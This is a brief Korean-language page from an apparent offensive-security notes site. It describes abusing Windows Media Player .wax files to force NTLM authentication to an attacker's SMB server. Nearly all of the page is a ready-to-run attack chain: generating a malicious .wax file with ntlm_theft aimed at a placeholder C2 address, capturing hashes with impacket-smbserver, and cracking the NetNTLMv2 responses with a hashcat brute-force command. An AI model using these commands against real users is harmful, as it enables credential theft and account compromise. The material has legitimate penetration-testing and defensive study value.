wax

wax는 Windows의 미디어 플레이어를 실행하기 위한 미디어 확장 파일입니다.

이 확장자는 로컬에 미디어 데이터를 저장하지 않고 저장된 주소로 접속하여 재생하는 방식이기 때문에 공격자 smb 서버로 접속하는 명령도 정상적인 것으로 취급됩니다.

Windows 환경에서 원격 smb 서버에 접속하면 현재 세션으로 ntlm 인증을 수행하기 때문에 공격자는 수신된 챌린지 응답을 크랙할 수 있습니다.

# ntlm 강제인증 파일 생성
git clone https://github.com/Greenwolf/ntlm_theft.git
cd ntlm_theft
python3 ntlm_theft.py -g wax -s '<c2-address>' -f ntlmsteal

# smb 서버 실행
impacket-smbserver share . -smb2support

# 탈취한 ntlm 챌린지 응답 크랙
hashcat -m 5600 -w 4 -a 3 -1 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&' ?1?1?1?1?1?1?1?1?1?1?1?1 -i --increment-min=4 --increment-max=12 --potfile-path tmp.potfile
PreviousurlNextMicrosoft Word

Last updated